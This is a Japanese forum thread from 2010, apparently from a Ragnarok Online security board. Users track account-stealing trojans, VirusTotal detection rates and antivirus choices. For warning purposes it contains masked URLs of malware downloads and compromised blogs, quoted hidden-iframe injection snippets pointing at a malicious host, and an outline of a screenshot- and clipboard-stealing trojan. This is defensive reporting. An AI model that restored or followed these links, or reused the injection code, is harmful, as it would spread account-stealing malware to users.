>新機能!未知のウイルスの検知を強化する、ヒューリスティック型エンジン
>「ETHOS(エトス)」を搭載しました。

だそうな。どんなもんだかね。 <> (○口○*)さん<>sage<>10/03/11 13:07 ID:cMaq3b/00<> >>597
いれてみた。

検体のzipを解凍して、セキュリティソフトの警告を無視にして解凍完了させた。
ファイルが一瞬出た直後に隔離され、ファイルが存在しなくなった。
隔離から戻すを押しても戻ってこなかった。

Gumbler系とかの新種への対応という意味では保険的に入れといてもいいかもしれない。
動作自体は軽い。普通のセキュリティソフトと併用してもいいかもしれない。
誤爆隔離された場合に戻らないかもしれない危険もあるが、再インストールして、除外設定すれば済むことだ。

検体提出しようという人にとってはあるとやりにくい。という訳で私はアンインストールした。 <> (○口○*)さん<>sage<>10/03/11 22:22 ID:mgj50bGO0<> >>596
某セキュ板のバスターユーザーによると
Packer検知は実物では引っかけないんすよ。
できれば subwiz.trendmicro.com あたりから送っといてください。 <> (○口○*)さん<>sage<>10/03/12 00:01 ID:iTdg/U/H0<> >>599
了解。提出しとく。AVGみたくヒューリスティックで検知してるとこや、Genericで検出してるとこに一通り出しとくわ。 <> (○口○*)さん<>sage<>10/03/12 09:16 ID:/jPK/iaw0<> >>579
いつのまにやら毎度おなじみの福建一味ドメインはRM業者モドキになってたのか。
メジャーどころの名前はあらかた食い潰したうえに対策されているからだろうけど。

マツブシモドキWhois
Domain Name : matubusi■net
Creation Date : 2010-01-28 15:47:05
Registrant:
Organization : xiao lin
Name : xiao lin
Address : fu jian long yan xi bizhen shi qiao tou cun 58hao
City : longyan
Province/State : FJ
Country : cn
Postal Code : 364000

次はどんなモドキドメインがくるやら。
気をつけてくれよな! <> (○口○*)さん<>sage<>10/03/16 01:29 ID:9atj73qk0<> >>592の続報

IE 6/7の脆弱性:深刻な状況、早急に対策を〜掲示板に誘導書き込みのワナも
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2182

マイクロソフト セキュリティ アドバイザリ (981374)
Internet Explorer の脆弱性により、リモートでコードが実行される
ttp://www.microsoft.com/japan/technet/security/advisory/981374.mspx <> (○口○*)さん<>sage<>10/03/16 10:52 ID:OOqe/4gp0<> ttp://pc11.2ch.net/test/read.cgi/hosting/1265865396/298-299
xreaは何度やられれば気が済むんだw <> (○口○*)さん<>sage<>10/03/16 13:33 ID:1YlX8Scg0<> そこの魚拓見ても大丈夫? <> (○口○*)さん<>sage<>10/03/16 13:39 ID:eBHDwTFM0<> >>604
ウイルスの可能性は低い…とは思うが、保証できないので
心配だったら直接開かずに対象をファイルに保存して、
ソースを見て何かが注入されているということだけ把握すればいいと思う <> (○口○*)さん<>sage<>10/03/16 13:58 ID:eBHDwTFM0<> 一応
被害はs21■xrea■comのトップや管理画面や各ユーザーページなどほぼ全域と思われる

IFRAMEでSWFファイルが埋め込まれている
http://www■s21■xrea.com/cakes■swf

VirusTotalでは(0/42)
http://www.virustotal.com/jp/analisis/4d87019497f285c5f1d38151a4b747d3352ad542017a23b2e99842b041d4060c-1268700888 <> (○口○*)さん<>sage<>10/03/16 16:13 ID:tgBkKdMq0<> 全スルーってすごくない?
ウィルスだったら爆釣で
大きいニュースになりそうだけど <> (○口○*)さん<>sage<>10/03/16 16:23 ID:aNtO7bX+0<> まあ今までにも何度かやってるからね
2ちゃんのVDスレでも一応報告は上がっているが、それっきりで誰も反応していないのが気になる <> (○口○*)さん<>sage<>10/03/16 16:27 ID:aNtO7bX+0<> ああ、でもxreaスレでは10時前ぐらいから乗っ取られたという報告は上がってるな
その後特に改善したとかもな
く(お名前.comがDNSを書き換えられるなどむしろ悪化)
だらだら過ぎている様子 <> (○口○*)さん<>sage<>10/03/16 16:29 ID:eBHDwTFM0<> ただ単に改ざんをアピールするためにFlash貼りたかっただけ
=Flashは本当に無害 という可能性もあるね <> (○口○*)さん<>sage<>10/03/17 00:25 ID:UOOCwC7x0<> 向こうのログ読んだ感じだと実害なしの愉快犯っぽい <> (○口○*)さん<>sage<>10/03/17 08:00 ID:JdepGiHe0<> 実害が無いのは不幸中の幸いなだけで、デジロックが相変わらずダメだという事実… <> (○口○*)さん<>sage<>10/03/18 13:29 ID:9bM/CWJ80<> 天野こずえの公式サイトってどうなん
http://ariapokoten■sakura■ne■jp/ <> (○口○*)さん<>sage<>10/03/18 13:30 ID:8/rsrXqN0<> >>613
aguseでもかけてろ <> (○口○*)さん<>sage<>10/03/18 14:26 ID:0S3f2oFJ0<> >>613

>1
■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■ <> (○口○*)さん<>sage<>10/03/21 16:02 ID:7nrrYNWt0<> ttp://www■4gameranking■com/flash/0020856■zip
いつもの4gamerankingだけど久々にh抜きで鯖板に書き込みがあったので。
BOTの文字に反応して書き込んでるみたい。
ちょいと中身を確認できる環境がないので丸投げですが一応。 <> (○口○*)さん<>sage<>10/03/22 10:22 ID:y9ZOO2J30<> >>616
こないだ提出したからVTにも残ってる筈…こんな感じで。

2010.03.11(24/42)
ttp://www.virustotal.com/analisis/69840175fbb85d818f9cc45e39c94fa27229ce79df293ad483ef6c0bd273cea0-1268281995

今朝(30/42)
ttp://www.virustotal.com/analisis/69840175fbb85d818f9cc45e39c94fa27229ce79df293ad483ef6c0bd273cea0-1269220836 <> (○口○*)さん<>sage<>10/03/22 10:30 ID:y9ZOO2J30<> あ、そうそう、そのzipの中身は、MS-aionPlayncmaohuaJP■exeでその中身は、偽装用(?)のjpegとmxd■exe。
AntiVirの検出名はどちらのexeもDR/PcClient.Genでした。名前からすると、AION向け?
検出名見ると、バックドア系だね。(トレンドマイクロが未対応…バスターがんばれ)

一応
mxd■exe(39/42) 本体
http://www.virustotal.com/analisis/512be79b4fb0d0830c316723525422875e1ad3159b6692859f7e5f970c080a54-1269221095

MS-aionPlayncmaohuaJP■exe(34/42) 本体を内蔵
http://www.virustotal.com/analisis/9fc2735ed0023b6ce977f0c7fd322ac37848077e2b589d4b42635095591b62fa-1269221099 <> (○口○*)さん<>sage<>10/03/22 10:31 ID:y9ZOO2J30<> 追記:3/11に入手した検体の情報です、現時点での再入手は試みてないので、入れ替えられていないかどうかは不明。 <> (○口○*)さん<>age<>10/03/23 10:44 ID:1Fq4A5P+0<> 未実装システム情報スレ 389
■公式HPの公知を速攻で書き写すスレ その10■
ローグ・チェイサー238

以上のスレに投稿されたもの。検出率悪いので警告のためにageときます。

−−−−−
【RO】魂HLで狭間に行ってみた
tp://www■uproda■net/down/uproda011186■zip
−−−−−

検出率かなり悪いです。
検体提出する予定ですが、今、時間ないので、提出作業は午後になりそう。
早目に提出できる方がおられましたらよろしく。

uproda011186■zip(15/42)
http://www.virustotal.com/analisis/115a34356ef137f83d45f978687d1907e5b50193429838f689969412d656663a-1269308468

中身
syplay■exe(17/42)
ttp://www.virustotal.com/analisis/081fa00a6edfbe5805eadf0319e0acd89a95a24c0c3fbde5e06b34b1eb9cf3cc-1269308483 <> (○口○*)さん<>sage<>10/03/23 11:38 ID:4dciX9b/0<> 某割れ厨SS晒しトロイが、nPro起動するROでも活動するっぽい。

微妙にスレチなのでsage <> (○口○*)さん<>sage<>10/03/23 13:37 ID:/sjLQ1r80<> 616で書き込みに使われたホスト

pc2.jupiter-1-unet.ocn.ne.jp
ジュピター電算機システム株式会社/?/?

なんか普通のソフト開発会社から書き込みしてたみたいなのでBOTネットにでもなってるのかしら? <> (○口○*)さん<>sage<>10/03/23 14:55 ID:8SoaAXDa0<> 重要度“最高”の3件を含む全5件の脆弱性を修正した「Firefox」v3.6.2が公開

http://www.forest.impress.co.jp/docs/news/20100323_356318.html <> (○口○*)さん<><>10/03/23 14:59 ID:DxXRl6On0<> >>622
ホスト名で検索を掛けると他にもブランド品コピーspamを投稿しているようなので、その可能性が高いかと。 <> (○口○*)さん<>sage<>10/03/23 15:27 ID:1Fq4A5P+0<> >>616-618
>620提出のついでに、再入手してみた。3/17時点でファイルが置き換えられていた模様。
ファイルの構成は変わらず。一緒に検体提出しときます。

0020856■zip(23/42)
http://www.virustotal.com/analisis/39a0e0285d0b49cb0e03fdc8e30656f2390bc995c6e8c07ba2f1e4122f4322fc-1269325297

MS-aionPlayncmaohuaJP■exe(24/42)
http://www.virustotal.com/analisis/22a5985a20b5c57fe556d445ed1309f2a616077a1f7f66a717bdc3fb45f66490-1269325350

mxd■exe(29/42)
http://www.virustotal.com/analisis/6bf4beec8c1bb30be45b29207d181b895759f9183249180437062608c0e255dd-1269296776 <> (○口○*)さん<>sage<>10/03/23 16:06 ID:nowH1FB20<> あれに引っかかるのは限定された相当の馬鹿でしょ
こんな感じらしいけど

758 名前:番組の途中ですが名無しです[sage] 投稿日:2010/03/23(火) 03:07:20 ID:q2I00Edg
>>621
[起動時]
初期化処理
乱数生成
トラップ発動
  ユーザ名、OS、IP、他取得
  スクリーン情報取得
  クリップボード取得
  config.xml読み込み
  ディレクトリパス取得
C:配下に乱数名でディレクトリ作成
スクリーンショット撮影して保存
コントローラ生成
終了時に画像アップロードイベントを呼ぶように設定
ウィドウ表示

[終了時]
アップロード
壁紙を警告文に変更
サイトを開く
作成したディレクトリを削除
ウィンドウを消す

昨日の状態
結果: 1/42 (2.38%)
ttp://www.virustotal.com/jp/analisis/0f84cd9843946f879e2b9ff8e9ccd77686af1a62c6fb9cd1af897205d7691422-1269261104 <> (○口○*)さん<>sage<>10/03/23 18:08 ID:KINiGLJt0<> ついさっき、誤ってzipファイルのURLクリックしたら
Trojan.Win32.Pincav.xqpっていうトロイが検出されたんだけど
アカハックかな? <> (○口○*)さん<>sage<>10/03/23 18:13 ID:VhuA8c2T0<> どうみても害をなすトロイです。垢ハクどころじゃないと思うから
ネット切ってPCクリーンインストールしてこい <> (○口○*)さん<>sage<>10/03/23 18:15 ID:1Fq4A5P+0<> >>627
アドレスもなにもわからないなら回答しようがないわ。誤検出かもしれんし。
>>2の相談用のテンプレ位使えよ。

でも、その(カスペの)検出名は、>620の検体と一緒。提出直後のメールで、新種としてその名称の返答が来た。
亜種区別の部分まで同じ名称だから、同じものかもね。 <> 627<>sage<>10/03/23 18:28 ID:KINiGLJt0<> >>620と同じです

ハックですか・・・おわた・・・ <> (○口○*)さん<>sage<>10/03/23 19:22 ID:1Fq4A5P+0<> >>630
PCリカバリか、OS再インストールコースいってらっしゃい <> まとめ臨時
◆kJfhJwdLoM<>sage<>10/03/23 20:03 ID:pNfj+oEw0<> Firefox 3.6.2アップデート。 <> (○口○*)さん<>sage<>10/03/23 20:25 ID:G0z808F50<> >>628のレスを見た後すぐにリカバリしてきました
第三者がログインした形跡もなかったので、ハックは免れたみたいです
すぐにPASS変更しました

お騒がせして申し訳ありませんでした <> (○口○*)さん<>sage<>10/03/23 22:38 ID:n7rENxSf0<> Operaも10.51きたな。 <> (○口○*)さん<>sage<>10/03/24 03:08 ID:hEX+BbPTO<> いつの間にかNOD32の改良版?っぽいスマートセキュリティってのが出てるのね

ここ3年くらいずっとカスペだったんだけど2010にしてから反応が過敏になりすぎて、乗り換えようか悩んでる
NOD32はカスペ並って評価をどっかで見たけど、使ってる人いたら意見貰えないだろうか <> (○口○*)さん<>sage<>10/03/24 03:12 ID:JGiBkN+00<> NOD32 AntiVirus使用
動作は異常に軽いが、一年ちょい使ってて何かしらを検知したことが一度もない…… <> (○口○*)さん<>sage<>10/03/24 03:17 ID:mOzjzpDG0<> >>635
カスペ並というのがどっから出た意見なのか知らんけど、見るべきものはその軽さだけ。

検出率はそれなり。新種への対応はかなり遅い。新種のパターン増やすよりヒューリスティックって
方向っぽいけどノートン並みの対応速度の遅さというのはどうなんだろう。

個人的には、軽さを求める人にしか勧めないと思う。今なら軽さと検出率が両立したAntiVirあるしな。 <> (○口○*)さん<>sage<>10/03/24 03:22 ID:hU5Hur930<> >>636
踏まなければ検知しないのは、本来当然であること <> (○口○*)さん<>sage<>10/03/24 04:42 ID:Ux0rzXPgO<> 携帯から失礼します。
630のタイプは、
URLクリックの段階で気付いて
DL選択でキャンセルでもアウトですか?
PCリカバリーすらできないギルメン二人が、
上記の状態らしくて。
助言を頂けると幸いです。 <> (○口○*)さん<>sage<>10/03/24 05:12 ID:mOzjzpDG0<> >>639
ダウンロードした後に解凍して実行しないと感染はしない。

ただ、そのzipに到達するまでの間に他の何かを落としているとか、zipに偽装した実行ファイルだったりとか
可能性はいろいろ考えられるので、安全であるとの保証は行えません。 <> 639<>sage<>10/03/24 05:39 ID:Ux0rzXPgO<> 640様

参考になりました。
ギルメンには不安なら友人かお店に頼むなりして、
自己責任できちんと対応させるようにします。

ご丁寧な説明ありがとうございました! <> (○口○*)さん<>sage<>10/03/24 05:42 ID:C8EQWUb20<> リカバリすらできない奴の言ってる事は信じられん <> (○口○*)さん<><>10/03/24 07:41 ID:YF37RZCs0<> どうせWGAも通らない環境なんだろ <> (○口○*)さん<>sage<>10/03/24 13:36 ID:hMU+yDMu0<> http://picopico2■dip■jp/uploader/data/1/1269277702385■txt

ピコロダで上記のアドレスのtxtを踏んだのですが、真っ白な画面で何も表示されませんでした。
ハックでしょうか? <> (○口○*)さん<>sage<>10/03/24 13:45 ID:Dd0cx4L20<> うん <> (○口○*)さん<>sage<>10/03/24 13:50 ID:Hs49M4nu0<> ただの0バイトのファイルの模様

ちなみに
・このスレは『勇気が無くて見れないサイト解説スレ』ではありません (>>1)
・ページの外見とハックは関係ありません
(a)ページが真っ白だからといって垢ハックとは限りません
  サーバの不調で意図せずページが表示されない(真っ白)の場合もありますし、
  うpろだだとわざと意味のないファイルをうpする人もいます(多分コメント欄で何か発言したいだけ)
(b)逆にページが普通だからと言って安心はできません
  カモフラージュとして普通のページを表示しつつ裏で垢ハック発動というページも存在します <> (○口○*)さん<>sage<>10/03/24 13:55 ID:hMU+yDMu0<> >>646
迅速な反応ありがとうございます。
ここ以外で相談するところを知らなかったので申し訳ないです。 <> (○口○*)さん<>sage<>10/03/24 18:48 ID:fxbhVsMx0<> 迷ったら 物(凄い勢いで誰かが)質(問に答える)スレ がオススメ
らいぶろか2chの初心者の質問板にある、ただし答えてもらえるかどうかの保証はない <> 635<>sage<>10/03/24 20:39 ID:hEX+BbPTO<> 意見ありがとう
スマートセキュリティは軽いだけで微妙か〜
カスペは過敏だけどちゃんと監視してるって納得するかぁ

ところで>>637の言ってる両立してるアンチウィルスって何てソフト? <> (○口○*)さん<>sage<>10/03/24 20:47 ID:CTHNd7iM0<> >>649
AntiVirって書いてるから、Avira AntiVirを指していると思われ <> (○口○*)さん<>sage<>10/03/24 22:25 ID:mOzjzpDG0<> >>649
AntiVirって書いたのに…
ttp://www.avira.com/jp/ <> (○口○*)さん<>sage<>10/03/25 00:15 ID:SS/TQQA5O<> ギャー!申し訳ない
アンチウィルスを略してるのかと思ってたorz
Antivirって名前だったのね…
しばらくサブPCで使ってみて良さげならメインにも入れようかな
ちなみに、カスペから乗り換える選択肢ってあると思う? <> (○口○*)さん<>sage<>10/03/25 02:05 ID:+x8Q49sK0<> カスペの期限あるならわざわざ変える必要ないんじゃない
期限切れてから金かけたくないならどうぞ
ただしFW的機能はない <> (○口○*)さん<>sage<>10/03/25 02:14 ID:eiH0PNzQ0<> AntiVir+COMODOの俺参上 <> (○口○*)さん<>sage<>10/03/25 18:25 ID:BcM4YoQ50<> ぴころだにて
3 1269499549736.zip ACK を調節してスキル速度を上げる程度の能力【RO編】

トロイが張られているので注意。
ファイルはtrojan.win32.pincav.xqp <> (○口○*)さん<>sage<>10/03/26 00:21 ID:Vh6b4f800<> >>655
削除ずみ?見つかりませんでした。 <> (○口○*)さん<>sage<>10/03/26 00:34 ID:Vh6b4f800<> >235 :名無しさん@お腹いっぱい。:2010/03/24(水) 23:06:50 ID:6lXsjoGX0
>新しく絵チャット設置しました!!
>絵に興味のある方、交流しましょ〜♪(*・ω・)
>tp://aimeblog■com/ragnarok2ndw/

いつものiframeで、4gamerkingを呼び出す奴。

いつも通り、/xin/ を呼び出すのだが、難読化が進んでいる。3/24に置き換えられた模様。
呼び出される本体の抽出しようと思ったけど、凄く面倒になってたのでパス。

sandbox環境ある人、呼び出している本体のアドレス確認お願い。 <> (○口○*)さん<>sage<>10/03/26 00:52 ID:Vh6b4f800<> >>657(続き)
本体じゃなくて呼び出しスクリプトですが…更新直後だけあって、検出率流石に悪いね。

xin.htm(11/42)
http://www.virustotal.com/analisis/875f514ef3ef8165ac6d9fad9ba3b5e760eeb6c76287390dcd8bcddcf771f23a-1269531655
pack.js(0/42)
http://www.virustotal.com/analisis/fad075d6c2fdc882a5d65589fb9738d822bb0bc435bf3895850e7b33a047e829-1269531660
pack.css(1/42)
http://www.virustotal.com/analisis/e17cb278506e0cdcb9f52cdb2da2aa4080103b2a5b5146a5a43a37c6226baeec-1269531678

xin.htm : Trojan.JS.Agent.bhm(Kaspersky)
pack.js : NotDetected
pack.css : Trojan.JS.Zapchast.db(Kaspersky) <> (○口○*)さん<><>10/03/26 06:19 ID:JYeOBkrL0<> たまたまPG2のログを見て気づいたんですが、パッチ鯖に繋ぐときや
普通にRO起動中でも中国・台湾・韓国IPと通信してるんですね・・・
クライアント起動が高確率で失敗するのと関係あるのかなー <> (○口○*)さん<>sage<>10/03/26 06:34 ID:xHsl7Rvf0<> >>657
iframeじゃなくてframeで他人のブログ表示してるみたいだね。
で、その下にもう一つ隠しframeで4gamerkingを呼び出す奴

aimeblog.com のドメイン情報
有効期限 2010-03-02 07:24:09

Googleセーフブラウジングで4gamerkingからblog86fc2■com/へいったら
FC2のブログで感染してるのが3つ。1つはPWかかってるので確認不能。

metamonbuyobuyo■blog12■fc2■com/
/head><iframe src="HTTP://blog86fc2■com/xin" width=30 height=0></iframe

takeyou1017■blog97■fc2■com/
frame src="HTTP://blog86fc2■com/xin" width=30 height=0></iframe></body
この2つも4gamerkingへ誘導されるみたいだけど、Aguseのカスペルスキーはスルー

サイト blog86fc2■com/xin の調査結果 入力されたページあるいはファイルは存在しませんでした。 <> (○口○*)さん<>sage<>10/03/26 08:27 ID:Vh6b4f800<> 検体提出先変更
MicroWorld(eScan) <samples@mwti.net> → <samples@escanav.com>

一昨日提出分の回答はmwti.netのままだったけど、今日提出した分の返答はescanav.comに変わっており
文面中の提出先アドレスが書き換えられていました。 <> (○口○*)さん<>sage<>10/03/27 21:06 ID:ahoNcovS0<> tp://www■atwikisjp■com/blog/

リンク辿ってみたけど、404が多く、本体に到達できず。htmlのファイルは27日付かな。


tp://www■yaplogjp■com/blog/
こっちはほぼ一緒の構造だったが、404のファイルが少なかった。swfのファイルが全滅なのは上と一緒。
本体ファイルは tp://www■yaplogjp■com/Blog/c■exe
こっちは3/22付で作成。 <> (○口○*)さん<>sage<>10/03/28 14:59 ID:OhxBynWQ0<> 某RO関連スレに貼られていたもの

新武器・防具情報(詳細情報、セット情報)追加
tp://gamepaslog.com■wiki■FrontPage/

↑aguseでTrojan-Downloader.JS.Iframe.apkを発見とのこと
詳細についてはこのスレの皆様によろしくお願いしたいです。
自分はセキュリティ系詳しくないので。 <> (○口○*)さん<>sage<>10/03/28 18:25 ID:oICy4yZ/0<> >>663
有名な真っ黒ドメイン
ドメインごとNGしとけ

専ブラならtp://でもリンクされる
いくら詳しくなくても.と/くらいの区別はつけてくれ <> (○口○*)さん<>sage<>10/03/28 19:01 ID:jCc+FH6U0<> >>664
最後二行は言い過ぎ
そこにケチ付けるなら、他にもいっぱい言う相手がいるんじゃねの? <> (○口○*)さん<>sage<>10/03/28 19:02 ID:Jq1jJkiQ0<> そういう問題じゃない <> (○口○*)さん<>sage<>10/03/28 19:05 ID:jCc+FH6U0<> ああ、ドットを伏せにしてなかったのか。 <> (○口○*)さん<>sage<>10/03/28 21:26 ID:UV83noRJ0<> >>664
そこまで言うなら、正しい(?)マスクの仕方を説明する位しとけよ。

あと、ttp://までならほとんどの専ブラでリンク扱いされるが、tp://まで対応するのは少数じゃないかな。
安全の為には、tp://で怒る必要はないと思う。>>2の注意点でも、そこまで注意するようには言われていない。
(また、言う必要もないと思う)

今回は、ドメイン名部分のドットが消えてないので、(tp://がリンクになる少数の専ブラ使用者に限っては)
■の前までがリンク扱いされ、トップページまでは誤ってクリックしかねないんだろうな。

書き直すなら、こういう書き方になる。(↓)

 >663 (○口○*)さん sage 10/03/28 14:59 ID:OhxBynWQ0
 >某RO関連スレに貼られていたもの
 >
 >新武器・防具情報(詳細情報、セット情報)追加
 >tp://gamepaslog■com/wiki/FrontPage/
 >
 >↑aguseでTrojan-Downloader.JS.Iframe.apkを発見とのこと
 >詳細についてはこのスレの皆様によろしくお願いしたいです。
 >自分はセキュリティ系詳しくないので。 <> (○口○*)さん<>sage<>10/03/28 21:34 ID:UV83noRJ0<> >>663(>668)
tp://gamepaslog■com/wiki/FrontPage/

フレームで偽装用ページ+4gameranking(既知のマルウェア配布サイト)を開くもの。
>>660で説明されてるのと中身は一緒ってことだね。 <> (○口○*)さん<>sage<>10/03/29 17:31 ID:qXpnS4ID0<> >>658 >>669
4gamerankingのはIE6・IE7のゼロデイスクリプトになっていますね。
シェルコードの難読化が面倒な物になっていて
Wepawetで何も引っかけてくれないので
何が降ってくるかは未確認です
(いつも通りなら /xin/xia.exe ですが…)。
ここに限らず珍しくもなんともない手法になっちゃったので
IE6・IE7の利用者はとっととIE8にするか他のブラウザに乗り換えましょう。 <> (○口○*)さん<>sage<>10/03/29 18:22 ID:qXpnS4ID0<> >>662
ah14.htm MS06-014 (IE)
ah90.htm MS09-002 (IE)
nop.htm MS09-037 (MSVideo ATL)
webs.htm Flash + Office
こちらは全て阻止可能な物です。 <> (○口○*)さん<>sage<>10/03/30 10:59 ID:AEtwCvmR0<> Internet Explorerのセキュリティ更新の事前告知 (定例外)
ttp://blogs.technet.com/jpsecurity/archive/2010/03/30/3321898.aspx
配布は明日。
他の脆弱性も合わせて修正するので対象はIE5〜8らしい <> (○口○*)さん<>sage<>10/03/30 11:18 ID:MH5duli00<> >>671
いや、その情報、どのセキュリティソフトでって説明加えないと無意味なんだけど。 <> (○口○*)さん<>sage<>10/03/30 13:21 ID:tbS2bFEK0<> 一応これもはっとくか

IE向け緊急パッチを31日に公開しゼロデイ攻撃へ対応 - 別の深刻な脆弱性も解消
ttp://www.security-next.com/012324.html <> (○口○*)さん<>sage<>10/03/30 15:36 ID:M83QE7dy0<> >>673
ゼロデイではない(WindowsUpdateしているまっとうな環境なら問題ない)ってことです。 <> (○口○*)さん<>sage<>10/03/30 15:41 ID:MH5duli00<> >>675
不正確な情報が一番困るんだ。そこまできちんと書いといてくれ。 <> (○口○*)さん<>sage<>10/03/30 16:59 ID:M83QE7dy0<> >>672
Sun…ではなくOracleのJava6Update19も同日の予定。 <> (○口○*)さん<>sage<>10/03/30 21:41 ID:y07cPeHB0<> >>676
MS06-014といったらMSの脆弱性情報であってセキュリティソフト関係ない
ぐぐってもそのままでてくるし
自分が無知なだけでその上から目線は何なの? <> (○口○*)さん<>sage<>10/03/30 22:44 ID:n6jSavqm0<> 俺もなんで>>673が噛みついたのかさっぱりわからないw
セキュ板だのソフトウェア板だの居ると>>671なんて日常茶飯事だしなぁ・・・ <> (○口○*)さん<>sage<>10/03/30 23:58 ID:ilmN4gD70<> でっていう <> (○口○*)さん<>sage<>10/03/31 00:09 ID:XhpfZ20s0<> 乙 <> (○口○*)さん<>sage<>10/03/31 10:12 ID:DF+RDfDm0<> JavaとMSUpdateきてたね
あとウイルスバスターがPC再起動を要するアップデートをかけてきた <> L ★<>sage<>10/03/31 19:25 ID:???0<> 280 名前:(^ー^*)ノ〜さん[] 投稿日:10/03/31(水) 16:57 ID:Ib8nJJl90
ROで転売、BOSS ボス、GvGやってます。 ... しゅん☆のRO日記
http://www■atwikisjp■com/blog/

219.118.189.132 <> (○口○*)さん<>sage<>10/03/31 22:19 ID:cfI2xOkd0<> >>683
処理おつです、平日の夕方から大変だ <> (○口○*)さん<><>10/04/01 02:41 ID:yk11M3oR0<> 「彼氏のIEが6だった…別れたい…」
ttp://internet.watch.impress.co.jp/docs/uocchi/20100401_357803.html <> (○口○*)さん<>sage<>10/04/01 08:34 ID:Pboym2gB0<> はい?? <> (○口○*)さん<>sage<>10/04/01 13:22 ID:okMMbhMv0<> ttp://f61.aaa■livedoor■jp/~efficacy/pukiwiki■php?%A5%EC%A5%A2%CB%C9%B6%F1
(.の部分を■に変えて有ります)
LiveROの『レア物(カード・装備)使用感報告スレ』のまとめwikiのURLなのですが
転送?される際に、URLの一部にハングル文字のような物が表示されていたのですが
ウィルスが組み込まれているのでしょうか?
ソースチェッカーオンラインで確認したところ、『マルウェアの検出はありませんでした』と
表示されていたのですがちょっと気になったので…。
自分の勘違いでしたらすいません。 <> (○口○*)さん<><>10/04/01 16:09 ID:HwEHaEf1O<> ここは鑑定スレだっけ? <> (○口○*)さん<>sage<>10/04/01 16:18 ID:L/3VNznd0<> 単に文字コードの認識がうまくいかなかったんじゃ?
めんどいので見ない <> (○口○*)さん<>sage<>10/04/01 16:24 ID:/1OXlQhf0<> ソースチェッカーオンラインはもう閉鎖しただろ
ネタなんじゃないの?

まさかaguse.netをわざわざsco呼ばわりしてんのか? <> (○口○*)さん<>sage<>10/04/01 23:49 ID:q61cp7Pr0<> mixiのRO関係コミュにアカハック張られてたんだけど、
これって書き込んだ人のアカウントにメッセージか何かで教えてあげた方がいいのかな?
「あなたのPCがウィルスに感染してスパム投稿しまくってるよ」とか。
まともに取り合ってくれない可能性もあるし、ちょっと悩んでる。

ちなみに頻繁にログインしているアカウントらしいので、
放置アカとかではない。 <> (○口○*)さん<>sage<>10/04/02 00:11 ID:x4FOG1Lq0<> 教えてあげたほうがいいんじゃない? <> (○口○*)さん<>sage<>10/04/02 00:20 ID:3UMTfpTM0<> >書き込んだ人のアカウントに
運営に通報するべきである。 <> (○口○*)さん<>sage<>10/04/02 00:26 ID:Wzf7gRvE0<> >>691
ログインしているのがアカウントの本来の持ち主とは限らない
(乗っ取られていることがある)。
なので>>693 <> (○口○*)さん<><>10/04/02 02:44 ID:zCmRpFK20<> mixiも招待制から登録制に移行したから、最初からspam目的のアカウントである可能性も捨て切れないな。
なので>>693 <> (○口○*)さん<>sage<>10/04/02 05:30 ID:l3ndJxgB0<> 本人に言ってそれで安心ってなるわけでもないし運営なら削除なり停止なりしてくれるだろう
なので>>693 <> (○口○*)さん<>sage<>10/04/02 11:40 ID:OF4JWp6E0<> だいたい本人に言ったって理解できずに逆ギレされるだけだろ
なので>>693 <> (○口○*)さん<>sage<>10/04/02 11:50 ID:9T0q54xo0<> >>691
当事者への報告はあり。ただし、何が起きているのか(自分がmixiの垢をハックされている)のを、
全く無知な人に理解できるように説明する必要あり。

運営への報告・削除依頼は最優先。 <> (○口○*)さん<>sage<>10/04/02 11:51 ID:9T0q54xo0<> 追記、>691は投稿された内容をこっちにも転記しといてくれ

危険トピ報告
ttp://mixi.jp/view_bbs.pl?id=22515115 <> (○口○*)さん<>sage<>10/04/02 11:57 ID:DUIg28CK0<> 垢ハックしている当人が、それを指摘されたメッセージを削除するだとか、
そういう可能性まで考えようよ。

経験上は放置垢が多いらしく、後に削除されていることしばしば。 <> (○口○*)さん<>sage<>10/04/02 12:10 ID:9T0q54xo0<> >>700
で、そうされて、どんな実害が?

アカハックアドレスの投稿をしているIDの正規のユーザーが見た場合 → 改善される可能性
アカハックアドレスの投稿をしている不正アクセスユーザーが消す → 正規ユーザが気付くより運営の対応が先になるだけ

コメントに気付いて、アカハック業者が消すことも確かにあり得るが、経験上、コメントではなくメッセージにした場合
(業者はメッセージ[メールみたいなもん]は、まずチェックしないので)正規のユーザーが読む可能性が高いです。

■運営が該当のコメントやトピックを消すことは対症療法でしかありません。
  垢停止になれば、そのSNS内だけでは解決しますが、使いまわしのパスワードなど、被害者のPC経由やアカウント利用により、
  余所でも同様の攻撃を繰り返す可能性は残ります。
  mixiの垢ハックされている人が、自分のPCのトロイを消してパスワードを変更することは根本的な解決策になります。 <> (○口○*)さん<>sage<>10/04/02 12:12 ID:9T0q54xo0<> >699のトピックに報告のあった、最近貼られたアカハックリンク

八宝気骨ある功ttp://soso■bz/rmc

 実際のリンク先
  www■matubusi■net/mimi/ro■rar
−−−−−
ROで転売、BOSS ボス、GvGやってます。 ... しゅん☆のRO○記 (←の○は「日」です)禁止ワードの為置換
www■atwikisjp■com/blog/ <> (○口○*)さん<>sage<>10/04/02 12:14 ID:OXsIXOX20<> >>701
そもそも垢ハックはユーザー間で対処すべき事案でないんじゃ?
ネットセキュリティに関してどのような立場の方かはご存じないですが <> (○口○*)さん<>sage<>10/04/02 12:27 ID:9T0q54xo0<> (>701で言葉が欠けてたので追記)

そのため、運営側への報告と同時に、(該当ユーザーがわかっているなら)個人に対しても報告を入れるのは有益ということ。

>>703
そら、アカハック食らってる当人の責任でしょ。ユーザー間で解決する問題じゃなくて。

単に、連絡先がわかっており、管理者への連絡手段があるなら、連絡することは有益だと述べているだけ。
管理者が不明な場合、サーバー管理者のabuse窓口(今回ならmixi運営)に連絡するのは妥当。

例えば掲示板への削除依頼は、サーバーのIP管理業者ではなく、掲示板の運営者に行なうでしょ。
それと一緒。ただ、今回のような場合は、掲示板管理者に当たるユーザーがアカウントを不正利用されている
可能性がある為、管理者だけに連絡するのでは不適切で、運営に対しても連絡する必要があるだけ。 <> (○口○*)さん<>sage<>10/04/02 12:38 ID:9T0q54xo0<> >>702 のアドレス一応チェック

www■matubusi■net/mimi/ro■rar (31/42)
http://www.virustotal.com/analisis/cd7b158ae55be02541020b8ee1dbd9c3557d316b9fc08d0e54b42d800b8b8b50-1270178103
中身のro■exe (33/42)
http://www.virustotal.com/analisis/cee9c434a95b4080b6d51fe1cdb45b8022f93bba3ebccbfef52ac1b22e1d871b-1270178198

tp://www■atwikisjp■com/blog/
2つのhtmlを呼び出してるだけなので、VTでも(0/42)

